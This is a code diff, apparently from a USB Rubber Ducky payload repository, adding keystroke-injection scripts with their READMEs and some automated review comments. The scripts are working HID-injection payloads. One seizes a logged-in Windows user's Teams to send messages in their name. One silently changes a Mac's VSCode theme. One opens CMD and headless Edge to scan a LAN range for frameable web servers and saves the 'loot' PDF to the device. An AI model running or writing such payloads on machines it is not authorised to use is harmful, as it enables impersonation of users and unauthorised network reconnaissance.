A script used to prank your friends sending a message through the user Teams.
|
||||
|
||||
Open a PowerShell, stop Teams if is runned, run Teams, run new message function, search the receiver, write and send some messages, then close the app.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* Microsoft Teams installed and user logged-in
|
||||
* ExecutionPolicy Bypass
|
||||
* Python
|
||||
|
||||
### Settings
|
||||
|
||||
- Setup the receiver
|
|
@ -0,0 +1,65 @@
|
|||
REM ###########################################
|
||||
REM # |
|
||||
REM # Title : Send Messages In Teams |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ###########################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Microsoft Teams installed and user logged-in
|
||||
REM - Internet Connection
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
|
||||
REM 1. Open a powershell
|
||||
REM 2. Close if Teams is opens and reopen it
|
||||
REM 3. Goto search bar
|
||||
REM 4. Search the person by name, email, id or what you want...
|
||||
REM 5. Downarrow and enter to open the chat
|
||||
|
||||
REM REQUIRED - Name, email, id or what you want for contact the target
|
||||
DEFINE USER-ID example
|
||||
REM REQUIRED - Messages
|
||||
DEFINE MESSAGE1 example
|
||||
REM ...
|
||||
REM DEFINE MESSAGEN example..
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
REM #### Powershell ####
|
||||
STRINGLN Stop-Process -Name "Teams"
|
||||
DELAY 1000
|
||||
STRINGLN Start-Process "$Env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams (work or school)"
|
||||
REM It depends by the computer power
|
||||
DELAY 10000
|
||||
|
||||
REM #### Teams ####
|
||||
CTRL N
|
||||
DELAY 2000
|
||||
STRING USER-ID
|
||||
ENTER
|
||||
DELAY 2000
|
||||
TAB
|
||||
DELAY 1000
|
||||
TAB
|
||||
DELAY 1000
|
||||
|
||||
REM #### Messages ####
|
||||
STRING MESSAGE1
|
||||
ENTER
|
||||
DELAY 1000
|
||||
REM ...
|
||||
REM STRINGLN MESSAGEN
|
||||
|
||||
DELAY 500
|
||||
ALT F4
|
||||
DELAY 500
|
||||
ALT F4
|
|
@ -0,0 +1,28 @@
|
|||
# Set VSCode to light theme - MacOS ✅
|
||||
|
||||
Plug-And-Play ❤️
|
||||
|
||||
A script that sets the VSCode theme to light to let the nightmare of every developer come true!
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
A script that opens VSCode, goes to the settings, changes the theme and then sneakily closes the settings again.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* MacOS system
|
||||
* VSCode installed
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
*None*
|
||||
|
||||
|
||||
https://user-images.githubusercontent.com/69253692/231779555-bb0e86d1-61ae-4170-809e-0f0723c58445.mov
|
|
@ -0,0 +1,65 @@
|
|||
REM ################################################
|
||||
REM # |
|
||||
REM # Title : Setting VSCode theme to light |
|
||||
REM # Author : Kile |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : MacOS |
|
||||
REM # |
|
||||
REM ################################################
|
||||
|
||||
REM DESCRIPTION: Opens VSCode settings and sets it to light mode - beware, eyes may be permanently damaged
|
||||
|
||||
ATTACKMODE HID VID_05AC PID_021E
|
||||
DELAY 500
|
||||
|
||||
REM Press the down arrow a lot to select the bottom most theme (which is a light theme)
|
||||
FUNCTION DO_DOWNS()
|
||||
VAR $COUNTER = 0
|
||||
WHILE ($COUNTER < 20)
|
||||
DOWN
|
||||
$COUNTER = ($COUNTER + 1)
|
||||
END_WHILE
|
||||
END_FUNCTION
|
||||
|
||||
REM Open VSCode
|
||||
COMMAND SPACE
|
||||
STRING Visual Studio Code
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 300
|
||||
|
||||
REM Open settings
|
||||
COMMAND ,
|
||||
DELAY 200
|
||||
REM Look for "theme"
|
||||
STRING theme
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 200
|
||||
|
||||
REM Tab to the first result
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
REM Open the theme dropdown
|
||||
ENTER
|
||||
ENTER
|
||||
DELAY 200
|
||||
|
||||
REM Note: There is also a key combinations to open a theme dropdown, however on that dropdown if you press down at the end it will go back up, so you canot be certain what mode is selected.
|
||||
|
||||
REM Select light mode
|
||||
DO_DOWNS()
|
||||
ENTER
|
||||
|
||||
DELAY 100
|
||||
REM Close the settings window
|
||||
COMMAND w
|
|
@ -0,0 +1,69 @@
|
|||
# "X-Frame-Options" Scanner
|
||||
|
||||
- Title: "X-Frame-Options" Scanner
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Category: Recon
|
||||
|
||||
## Description
|
||||
|
||||
Uses the "Microsoft Edge" web browser to search for web servers within
|
||||
a range of IPv4 addresses that do not have an "X-Frame-Options" header.
|
||||
|
||||
Then exports the results to a PDF file accessible in the Rubber Ducky.
|
||||
|
||||
The results contain the tested IPv4 addresses and the HTML rendering.
|
||||
|
||||
## Tested On
|
||||
|
||||
>
|
||||
> Microsoft Edge (Windows 10)
|
||||
>
|
||||
|
||||
| X-Frame-Options | Encryption | Detectable |
|
||||
| --- | --- | --- |
|
||||
| None | None | Yes |
|
||||
| Set to SAMEORIGIN | None | No |
|
||||
| Set to SAMEORIGIN | Self-Signed Certificate | No |
|
||||
|
||||
__NOTE :__ *All cases could not be tested.*
|
||||
|
||||
## Configuration
|
||||
|
||||
In the "payload.txt" file, replace the values of the following constants :
|
||||
|
||||
```
|
||||
|
||||
REM ---
|
||||
REM USB Rubber Ducky label.
|
||||
REM ---
|
||||
DEFINE #RD_LABEL DUCKY
|
||||
|
||||
REM ---
|
||||
REM Format of an allowed IPv4 address range.
|
||||
REM 192.168.0.X-192.168.0.Y where (X < Y)
|
||||
REM ---
|
||||
DEFINE #LAN 192.168.0.1-192.168.0.50
|
||||
|
||||
```
|
||||
|
||||
## Advanced Configuration
|
||||
|
||||
In the "main.js" file available in the "recon_files/assets/js/" directory,
|
||||
you can add new ports to be tested for each host :
|
||||
|
||||
```js
|
||||
if (LAN) {
|
||||
Promise.all(
|
||||
[
|
||||
...,
|
||||
recon('http', 8080),
|
||||
recon('https', 8443)
|
||||
]
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
## Usage
|
||||
|
||||
At the root of the USB Rubber Ducky, copy the "recon_files/" folder.
|
|
@ -0,0 +1,40 @@
|
|||
REM TITLE : "X-Frame-Options" Scanner
|
||||
REM AUTHOR : TW-D
|
||||
REM TARGET : Microsoft Edge
|
||||
REM VERSION : 1.0
|
||||
REM CATEGORY : Recon
|
||||
REM REQUIREMENT : DuckyScript 3.0
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 10000
|
||||
|
||||
REM ---
|
||||
REM USB Rubber Ducky label.
|
||||
REM ---
|
||||
DEFINE #RD_LABEL DUCKY
|
||||
|
||||
REM ---
|
||||
REM Format of an allowed IPv4 address range.
|
||||
REM 192.168.0.X-192.168.0.Y where (X < Y)
|
||||
REM ---
|
||||
DEFINE #LAN 192.168.0.1-192.168.0.50
|
||||
|
||||
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||
|
||||
IF ( $_CAPSLOCK_ON ) THEN
|
||||
CAPSLOCK
|
||||
DELAY 500
|
||||
END_IF
|
||||
|
||||
IF ( $_NUMLOCK_ON == FALSE ) THEN
|
||||
NUMLOCK
|
||||
DELAY 500
|
||||
END_IF
|
||||
|
||||
GUI r
|
||||
DELAY 1500
|
||||
STRINGLN CMD /K "MODE CON:COLS=18 LINES=1 && FOR /F %d IN ('WMIC Volume GET DriveLetter^, Label^|FINDSTR "#RD_LABEL"') DO @SET RD_LABEL=%d"
|
||||
DELAY 2000
|
||||
STRINGLN START MSEDGE --headless --disable-gpu --run-all-compositor-stages-before-draw --print-to-pdf="%RD_LABEL%\loot_%RANDOM%.pdf" "%RD_LABEL%\recon_files\index.html?lan=#LAN" && EXIT
|
||||
|
||||
RESTORE_HOST_KEYBOARD_LOCK_STATE
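Review bot: The two `STRINGLN` lines carry all of the payload's behaviour but have no `REM` above them, unlike the `DEFINE` blocks. I would add `REM Resolve the drive letter of the volume labelled #RD_LABEL into %RD_LABEL%.` before the `CMD /K` line and `REM Render recon_files/index.html in headless Edge and print the page to a PDF on that volume.` before the `START MSEDGE` line. The first comment should also record that `FINDSTR` matches the label as a substring. It should further note that `%RD_LABEL%` stays unset when no volume matches, in which case the second command runs with an unexpanded path.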
|
|
@ -0,0 +1,25 @@
|
|||
body {
|
||||
margin: 0;
|
||||
}
|
||||
|
||||
h1, #url {
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
#url {
|
||||
font-size: small;
|
||||
border-width: 1px;
|
||||
border-style: solid;
|
||||
border-color: white;
|
||||
color: whitesmoke;
|
||||
padding: 1vh 0 1vh 0;
|
||||
background-color: lightslategray;
|
||||
}
|
||||
|
||||
iframe {
|
||||
min-width: 100vw;
|
||||
max-width: 100vw;
|
||||
min-height: 98vh;
|
||||
max-height: 98vh;
|
||||
border-style: none;
|
||||
}
|
|
@ -0,0 +1,2 @@
|
|||
const LAN = (new URLSearchParams(document.location.search).get('lan'));
|
||||
const OUTPUT = document.querySelector('#output');
|
|
@ -0,0 +1,15 @@
|
|||
async function recon(scheme, port) {
|
||||
for (let target of targets()) {
|
||||
let url, div, iframe;
|
||||
url = (scheme + '://' + target + ':' + port + '/');
|
||||
div = document.createElement('div');
|
||||
div.id = 'url';
|
||||
div.innerText = url;
|
||||
iframe = document.createElement('iframe');
|
||||
iframe.sandbox = 'allow-same-origin allow-scripts';
|
||||
iframe.src = url;
|
||||
OUTPUT.appendChild(div);
|
||||
OUTPUT.appendChild(iframe);
|
||||
await sleep();
|
||||
}
|
||||
}
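Review bot: `iframe.sandbox = 'allow-same-origin allow-scripts'` lets script from every probed host run inside the browser that performs the scan, which the stated purpose (seeing whether the page renders in a frame) does not obviously need. If the rendering captured in the PDF does not depend on page script, `iframe.sandbox = '';` keeps each frame fully sandboxed; otherwise a comment should say why both tokens are required. Separately, `div.id = 'url'` gives every label in the loop the same id; `div.className = 'url';` with a matching `.url` selector in style.css would keep ids unique.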
|
|
@ -0,0 +1,7 @@
|
|||
function sleep() {
|
||||
return(
|
||||
new Promise(
|
||||
resolve => setTimeout(resolve, 1250)
|
||||
)
|
||||
);
|
||||
}
|
|
@ -0,0 +1,18 @@
|
|||
function targets() {
|
||||
let bounds, wholes, hosts;
|
||||
bounds = LAN.split('-');
|
||||
wholes = [bounds[0].split('.'), bounds[1].split('.')];
|
||||
hosts = [parseInt(wholes[0].pop()), parseInt(wholes[1].pop())];
|
||||
wholes = [wholes[0].join('.'), wholes[1].join('.')];
|
||||
if (wholes[0] === wholes[1]) {
|
||||
let whole, targets;
|
||||
whole = wholes[0];
|
||||
targets = new Array();
|
||||
for (let host = hosts[0]; host <= hosts[1]; host++) {
|
||||
targets.push(whole + '.' + host);
|
||||
}
|
||||
return(targets);
|
||||
} else {
|
||||
return(new Array());
|
||||
}
|
||||
}
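Review bot: `targets()` takes `LAN` straight from the query string without checking its shape, so a value without a `-` throws on `bounds[1].split('.')`. The address prefix also reaches `iframe.src` in `recon()` unvalidated, and the last octet is never bounded to 0-255. Both `parseInt` calls omit the radix as well. I would match the whole range against one pattern, require the two prefixes to be identical through a back-reference, and return an empty list for anything else, as sketched below.

```javascript
function targets() {
    // Accept only A.B.C.X-A.B.C.Y; \1 forces both prefixes to be identical.
    const match = /^(\d{1,3}\.\d{1,3}\.\d{1,3})\.(\d{1,3})-\1\.(\d{1,3})$/.exec(LAN ?? '');
    if (!match) {
        return [];
    }
    const first = Number.parseInt(match[2], 10);
    const last = Number.parseInt(match[3], 10);
    if (first > last || last > 255) {
        return [];
    }
    const hosts = [];
    for (let host = first; host <= last; host++) {
        hosts.push(match[1] + '.' + host);
    }
    return hosts;
}
```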
|
|
@ -0,0 +1,8 @@
|
|||
if (LAN) {
|
||||
Promise.all(
|
||||
[
|
||||
recon('http', 80),
|
||||
recon('https', 443)
|
||||
]
|
||||
);
|
||||
}
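Review bot: The promise returned by `Promise.all([...])` is neither awaited nor given a rejection handler. An exception thrown inside `recon()` (for example from `targets()` when `lan` contains no `-`) therefore ends the scan with nothing written to the page. Appending `.catch((error) => { OUTPUT.innerText = String(error); })` would make the failure visible in the exported result instead of producing an empty PDF.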
|
|
@ -0,0 +1,21 @@
|
|||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<link rel="stylesheet" type="text/css" href="./assets/css/style.css?version=1.0.0" />
|
||||
</head>
|
||||
<body>
|
||||
<main>
|
||||
<section>
|
||||
<h1>X-FRAME-OPTIONS Scanner</h1>
|
||||
<div id="output"></div>
|
||||
</section>
|
||||
</main>
|
||||
<script type="text/javascript" src="./assets/js/constants.js?version=1.0.0"></script>
|
||||
<script type="text/javascript" src="./assets/js/functions/targets.js?version=1.0.0"></script>
|
||||
<script type="text/javascript" src="./assets/js/functions/sleep.js?version=1.0.0"></script>
|
||||
<script type="text/javascript" src="./assets/js/functions/recon.js?version=1.0.0"></script>
|
||||
<script type="text/javascript" src="./assets/js/main.js?version=1.0.0"></script>
|
||||
</body>
|
||||
</html>
|